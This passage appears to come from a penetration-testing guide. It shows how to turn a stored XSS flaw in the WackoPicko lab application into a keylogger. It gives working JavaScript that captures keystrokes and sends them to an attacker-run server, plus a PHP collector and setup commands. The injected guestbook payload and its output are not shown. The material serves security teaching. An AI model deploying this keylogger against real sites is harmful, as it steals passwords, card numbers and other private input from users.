Another way to take advantage of XSS's ability to gather users' sensitive information is by turning the browser into a key logger that captures every keystroke and sends it to a server controlled by the attacker. These keystrokes may include sensitive information that the user enters in the page, such as names, addresses, passwords, secret questions and responses, credit card information, and other types, depending on the purpose of the vulnerable page.
We will use the Apache web server, which is preinstalled in Kali Linux, in order to store the keystrokes in a file so that we can check the keys sent by the vulnerable application once we exploit the XSS. The server will have two files: klog.php and klog.js.
This is how the klog.php file will look:
<?php if(!empty($_GET['k'])) { $file = fopen('keys.txt', 'a'); fwrite($file, $_GET['k']); fclose($file); } ?>
This is how the klog.js file will look:
var buffer = []; var server = 'http://10.7.7.4/klog.php?k=' document.onkeypress = function(e) { buffer.push(e.key); } window.setInterval(function() { if (buffer.length > 0) { var data = encodeURIComponent(buffer); new Image().src = server + data; buffer = []; } }, 200);
Here, 10.7.7.4 is the address of the Kali Linux machine, so that the victims will send the buffer to that server. Also, depending on the system's configuration, you may have to create the keys.txt file in the path specified in the code. In this example, it is the web root (/var/www/html/). Also, add write permissions or set the ownership to the Apache's user to prevent permission errors when the web server tries to update a local file:
touch /var/www/html/keys.txt chown www-data /var/www/html/keys.txt
This is the simplest version of a key logger. A more sophisticated version could include the following:
- Timestamp of the capture
- Identifier of the user or machine sending the information
- Saving keys to a database to facilitate queries, grouping, and sorting
- Controlling functionality, such as starting and stopping key loggers, triggering actions on certain keys or combinations
Using WackoPicko's Guestbook again, submit the following comment:
This will load the external JavaScript file in the page every time a user accesses the Guestbook page and capture all of the keystrokes issued by them. You can now type anything while in the page, and it will be sent to your server.
If you want to check what has been recorded so far, you just need to see the keys.txt file in Kali Linux:
You can see that as keys are buffered in the client and sent at regular intervals, there are groups of varying lengths separated by commas and the nonprintable keys are written by name: ArrowLeft, ArrowRight, Backspace, Home, End, and so on.